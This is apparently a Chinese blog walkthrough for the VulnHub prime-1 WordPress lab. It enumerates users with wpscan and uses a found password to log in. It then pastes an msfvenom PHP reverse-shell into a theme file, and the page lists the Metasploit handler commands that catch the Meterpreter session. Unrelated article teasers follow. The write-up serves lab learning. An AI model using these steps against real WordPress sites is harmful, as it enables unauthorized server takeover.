news 2026/4/18 7:21:24

kali反弹连接wordpress靶场详细教程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
kali反弹连接wordpress靶场详细教程

前言

本次实战通过prime靶场进行操作,从寻找测试点和getshell,对各项步骤进行详细记录,以方便参考

接上一篇文章https://blog.csdn.net/qq_66136699/article/details/155752517?fromshare=blogdetail&sharetype=blogdetail&sharerId=155752517&sharerefer=PC&sharesource=qq_66136699&sharefrom=from_link

目录

一、反弹连接是什么?

二、使用步骤

1.准备工作

2.实战操作

①登录网站

②指纹识别

③尝试登录​编辑

④寻找上传点

⑥构建shell代码

⑦创建监听通道

⑧反弹shell

总结


一、反弹连接是什么?

简单来说就是黑客控制了目标,并建立了监听的端口,以及构建了一个可以访问的后门,这里的反弹连接是在通过在后台服务端上传木马,当客户端访问带有木马的页面时,攻击机通过监听的端口获取到了系统的shell,获得了执行命令的权限

二、使用步骤

1.准备工作

使用靶场:vulnhub-prime-1

攻击机版本:kali2025.03、

在前面的信息收集环节我们获取到了靶场 wordpress 的账号和密码

url:http://192.168.12.134/wordpress/

密码:follow_the_ippsec

2.实战操作

①登录网站

访问 wordpress 后台的url,并找到 login in 关键词

点击进去发现是一个登录页面

②指纹识别

回到 kali 攻击机对网站做一个指纹识别

wpscan --url http://192.168.12.134/wordpress/ --enumerate u

参数说明:--url 指定识别的网站地址,-enumerate u: 枚举用户名

结果显示发现了一个已注册的用户名

目前掌握的重要信息

账户:victor

密码:follow_the_ippsec

③尝试登录

登录成功!!

④寻找上传点

wordpress有一个功能,可以在系统内部编辑代码,思路是找到其中可以编辑的代码框,并上传带有反弹shell木马的代码,位置以标出

我找到的可编辑文件是 secret.php,

⑥构建shell代码

回到kali,利用 msfvenom构建php反弹连接的代码

输入这一串指令,我的 kali ip地址为:192.168.12.128

构建成功后cat查看代码并复制,开头的 / *就不用了复制了

粘贴到 wordpress 中 secret.php,并上传更新

⑦创建监听通道

回到kali,需要设置一些参数来建立监听连接

msfconsole

使用 msf 控制终端

输入以下参数,确保与 msfvenom 构建的反弹shell的文件参数一致

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.12.128

set lport 7777

⑧反弹shell

exploit 开始监听端口,并等待反弹shell

根据wordpress的项目目录结构,可以确定 secret.php 文件在下面这个位置

为方便学习最好自己搞一套wordpress的源码研究

回车!!再回到 kali 反弹连接 shell 成功。

可以再上面输入一些简单命令,也就是说初步获取到了靶机执行命令权限


总结

本文简单介绍了反弹shell进行连接的使用,使用了msf工具构建了带有木马的shell代码,经过一层层得到信息收集和测试,最终获取到了服务端shell执行命令的权限。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/1 11:37:23

成都顶级游资泄密:颠覆你认知的5条短线铁律

引言:为何听了那么多道理,依旧在亏钱?你是否也曾经历这样的循环:花无数个夜晚研究K线,把各种技术指标烂熟于心,偶尔抓住一两个涨停便心生希望,但最终,一次猝不及及的大跌就足以吞噬掉…

作者头像 李华
网站建设 2026/4/11 1:58:49

晶体塑性有限元显示动力学cpfem_vumat子程序(界面调用程序)

晶体塑性有限元显示动力学cpfem_vumat子注意此程序为\"界面调用程序\",用于显示动力学。最近在搞晶体塑性有限元仿真的时候,发现显式动力学框架下的材料子程序开发真是个磨人的小妖精。特别是那个cpfem_vumat,说是"界面调用程…

作者头像 李华
网站建设 2026/4/18 5:15:35

基于R语言BIOMOD2 及机器学习方法的物种分布模拟与案例分析

查看原文>>> https://mp.weixin.qq.com/s/zNmqmmfkFq-I8DFRIKzt6A 【目标】: 1、理解物种分布模型的基本原理:理解物种分布模型(SDMs)的理论基础,包括模型的种类、用途以及在生态研究和环境管理中的应用。 …

作者头像 李华
网站建设 2026/4/18 6:24:16

pr 批量修改字幕样式的方法,简单又实用

做视频剪辑的人都知道:字幕样式统一,是让作品更专业的关键步骤。 但现实却是——很多新手剪辑师遇到字幕内容多、样式需要统一修改时,总会被 PR 的复杂操作折磨得头痛不已。 作为一直深耕 PR 剪辑的作者,我也遇到过类似问题&#…

作者头像 李华
网站建设 2026/4/18 6:25:09

基于非下采样轮廓波变换的图像融合

1. 概述 非下采样轮廓波变换(Non-Subsampled Contourlet Transform, NSCT)是一种多尺度、多方向的图像表示方法,能够有效地捕捉图像中的几何结构信息。基于NSCT的图像融合方法因其优秀的性能在医学成像、遥感图像处理等领域得到了广泛应用。 2. NSCT基本原理 2.1…

作者头像 李华